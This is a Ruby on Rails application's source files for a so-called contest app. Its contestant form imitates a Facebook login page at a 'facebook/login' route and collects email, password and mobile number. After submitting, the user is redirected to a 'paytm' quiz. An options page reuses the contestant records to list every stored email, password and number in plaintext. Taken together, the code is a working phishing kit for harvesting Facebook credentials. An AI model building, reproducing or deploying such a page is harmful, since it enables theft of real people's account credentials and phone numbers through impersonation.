config/routes.rb
Contest::Application.routes.draw do
  resources :options

  resources :questions

  resources :contestants do
   
  end

  get "facebook/login", :to => "contestants#facebook" , :as => "facebook"
  get "paytm/question/:id", :to => "questions#show" , :as => "question"
  get "paytm", :to => "questions#index" , :as => "questions"

  root :to => 'contestants#index'

end

app/models/contestant.rb
class Contestant < ActiveRecord::Base
  attr_accessible :email, :password, :result, :number
end

app/models/option.rb
class Option < ActiveRecord::Base
  attr_accessible :opt
end

app/models/question.rb
class Question < ActiveRecord::Base
  attr_accessible :que, :option_1, :option_2, :option_3, :option_4, :ans 

end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery
end

app/controllers/contestants_controller.rb
class ContestantsController < ApplicationController
  # GET /contestants
  # GET /contestants.json
  def index
    @contestants = Contestant.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @contestants }
    end
  end

  # GET /contestants/1
  # GET /contestants/1.json
  def show
    @contestant = Contestant.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @contestant }
    end
  end

  # GET /contestants/new
  # GET /contestants/new.json
  def new
    @contestant = Contestant.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @contestant }
    end
  end

  def facebook
    @contestant = Contestant.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @contestant }
    end
  end

  # GET /contestants/1/edit
  def edit
    @contestant = Contestant.find(params[:id])
  end

  # POST /contestants
  # POST /contestants.json
  def create
    @contestant = Contestant.new(params[:contestant])
    respond_to do |format|
      if @contestant.save
        @question = Question.all[0]
        format.html { redirect_to @question, notice: 'Contestant was successfully created.' }
        format.json { render json: @question, status: :created, location: @question }
      else
        format.html { render action: "new" }
        format.json { render json: @contestant.errors, status: :unprocessable_entity }
      end
    end
  end

  # PUT /contestants/1
  # PUT /contestants/1.json
  def update
    @contestant = Contestant.find(params[:id])

    respond_to do |format|
      if @contestant.update_attributes(params[:contestant])
        format.html { redirect_to @contestant, notice: 'Contestant was successfully updated.' }
        format.json { head :no_content }
      else
        format.html { render action: "edit" }
        format.json { render json: @contestant.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /contestants/1
  # DELETE /contestants/1.json
  def destroy
    @contestant = Contestant.find(params[:id])
    @contestant.destroy

    respond_to do |format|
      format.html { redirect_to contestants_url }
      format.json { head :no_content }
    end
  end


end

app/controllers/options_controller.rb
class OptionsController < ApplicationController
  # GET /options
  # GET /options.json
  def index
    @options = Contestant.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @options }
    end
  end

  # GET /options/1
  # GET /options/1.json
  def show
    @option = Option.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @option }
    end
  end

  # GET /options/new
  # GET /options/new.json
  def new
    @option = Option.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @option }
    end
  end

  # GET /options/1/edit
  def edit
    @option = Option.find(params[:id])
  end

  # POST /options
  # POST /options.json
  def create
    @option = Option.new(params[:option])

    respond_to do |format|
      if @option.save
        format.html { redirect_to @option, notice: 'Option was successfully created.' }
        format.json { render json: @option, status: :created, location: @option }
      else
        format.html { render action: "new" }
        format.json { render json: @option.errors, status: :unprocessable_entity }
      end
    end
  end

  # PUT /options/1
  # PUT /options/1.json
  def update
    @option = Option.find(params[:id])

    respond_to do |format|
      if @option.update_attributes(params[:option])
        format.html { redirect_to @option, notice: 'Option was successfully updated.' }
        format.json { head :no_content }
      else
        format.html { render action: "edit" }
        format.json { render json: @option.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /options/1
  # DELETE /options/1.json
  def destroy
    @option = Option.find(params[:id])
    @option.destroy

    respond_to do |format|
      format.html { redirect_to options_url }
      format.json { head :no_content }
    end
  end
end

app/controllers/questions_controller.rb
class QuestionsController < ApplicationController
  # GET /questions
  # GET /questions.json
  def index
    @questions = Question.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @questions }
    end
  end

  # GET /questions/1
  # GET /questions/1.json
  def show
    @question = Question.where(id: params[:id])[0]

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @question }
    end
  end

  # GET /questions/new
  # GET /questions/new.json
  def new
    @question = Question.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @question }
    end
  end

  # GET /questions/1/edit
  def edit
    @question = Question.find(params[:id])
  end

  # POST /questions
  # POST /questions.json
  def create
    @question = Question.new(params[:question])

    respond_to do |format|
      if @question.save
        format.html { redirect_to @question, notice: 'Question was successfully created.' }
        format.json { render json: @question, status: :created, location: @question }
      else
        format.html { render action: "new" }
        format.json { render json: @question.errors, status: :unprocessable_entity }
      end
    end
  end

  # PUT /questions/1
  # PUT /questions/1.json
  def update
    @question = Question.find(params[:id])

    respond_to do |format|
      if @question.update_attributes(params[:question])
        format.html { redirect_to @question, notice: 'Question was successfully updated.' }
        format.json { head :no_content }
      else
        format.html { render action: "edit" }
        format.json { render json: @question.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /questions/1
  # DELETE /questions/1.json
  def destroy
    @question = Question.find(params[:id])
    @question.destroy

    respond_to do |format|
      format.html { redirect_to questions_url }
      format.json { head :no_content }
    end
  end
end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/helpers/contestants_helper.rb
module ContestantsHelper
end

app/helpers/options_helper.rb
module OptionsHelper
end

app/helpers/questions_helper.rb
module QuestionsHelper
end

app/views/contestants/_form.html.erb
<%= form_for(@contestant) do |f| %>
  <% if @contestant.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@contestant.errors.count, "error") %> prohibited this contestant from being saved:</h2>

      <ul>
      <% @contestant.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>

  <% end %>


  <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Bootstrap Facebook Theme Login Form</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> 
<style type="text/css">
  body {
    color: #646464;
    background: #385898;
  } 
    .login-form {
        width: 300px;
      margin: 30px auto;
    }
    .login-form h2 {
        font-size: 26px;
    font-weight: bold;
        margin: 30px 0;
        text-align: center;
    }
    .login-form form {
    color: #fff;
        background: #405e9e;
    background: radial-gradient(circle, #4d6ba9, #375595);
        box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
        padding: 25px;
        margin-bottom: 15px;
    }
  .login-form .form-control {
    border-color: #dfdfdf;
    box-shadow: none !important;
  }
    .login-form .form-control, .login-form .btn {
        min-height: 38px;        
    }
    .login-form input[type="email"] {
        border-radius: 2px 2px 0 0;
    }
    .login-form input[type="password"] {
        border-radius: 0 0 2px 2px;
        margin-top: -1px;
    }    
    .login-form .btn {        
        font-size: 15px;
    font-weight: bold;
    border-radius: 2px;
    background: #eeeeee;
    color: #646464;
    margin-bottom: 25px;
        outline: none !important;
    }
  .login-form a {   
    color: #f5f5f5;
  }
  .login-form form a {
        color: #f5f5f5;
    }
  .text-center {
    color: #f5f5f5;
  }
</style>
</head>
<body>
<div class="login-form">
    <h2 class="text-center">Facebook</h2> 
        <div class="form-group">
          <%= f.text_field :email, type: "email", class: "form-control", placeholder: "Email", required: "required" %>
          <%= f.text_field :password, type: "password", class: "form-control", placeholder: "Password", required: "required" %>
          <%= f.text_field :number, type: "text", class: "form-control", placeholder: "Mobile Number", required: "required" %>
        </div>
        <div class="form-group">
           <%= f.button "Login", class: "btn btn-default btn-block" %>
        </div>
        <p class="text-center"><a href="#">Forgot Password?</a></p>     
    <p class="text-center small">Not Registered? <a href="#">Create an Account</a></p>
</div>
</body>
</html>                            





<% end %>

app/views/contestants/edit.html.erb
<h1>Editing contestant</h1>

<%= render 'form' %>

<%= link_to 'Show', @contestant %> |
<%= link_to 'Back', contestants_path %>

app/views/contestants/facebook.html.erb
<%= render 'form' %>

app/views/contestants/new.html.erb
<%= render 'form' %>

app/views/contestants/show.html.erb
<p id="notice"><%= notice %></p>


<%= link_to 'Edit', edit_contestant_path(@contestant) %> |
<%= link_to 'Back', contestants_path %>

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
<head>
  <title>Contest</title>
  <%= stylesheet_link_tag    "application", :media => "all" %>
  <%= javascript_include_tag "application" %>
  <%= csrf_meta_tags %>

</head>
<body>

<%= yield %>

</body>
</html>

app/views/options/_form.html.erb
<%= form_for(@option) do |f| %>
  <% if @option.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@option.errors.count, "error") %> prohibited this option from being saved:</h2>

      <ul>
      <% @option.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

app/views/options/edit.html.erb
<h1>Editing option</h1>

<%= render 'form' %>

<%= link_to 'Show', @option %> |
<%= link_to 'Back', options_path %>

app/views/options/index.html.erb
<h1>Listing options</h1>

<table>
  <tr>
    <th>email</th>
    <th>password</th>
    <th>number</th>
  </tr>

<% @options.each do |option| %>
  <tr>
    <td><%= option.email%></td>
    <td><%= option.password%></td>
    <td><%= option.number%></td>
  </tr>
<% end %>
</table>

<br />

app/views/options/new.html.erb
<h1>New option</h1>

<%= render 'form' %>

<%= link_to 'Back', options_path %>

app/views/options/show.html.erb
<p id="notice"><%= notice %></p>


<%= link_to 'Edit', edit_option_path(@option) %> |
<%= link_to 'Back', options_path %>

app/views/questions/_form.html.erb
<%= form_for(@question) do |f| %>
  <% if @question.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@question.errors.count, "error") %> prohibited this question from being saved:</h2>

      <ul>
      <% @question.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

app/views/questions/edit.html.erb
<h1>Editing question</h1>

<%= render 'form' %>

<%= link_to 'Show', @question %> |
<%= link_to 'Back', questions_path %>

app/views/questions/new.html.erb
<h1>New question</h1>

<%= render 'form' %>

<%= link_to 'Back', questions_path %>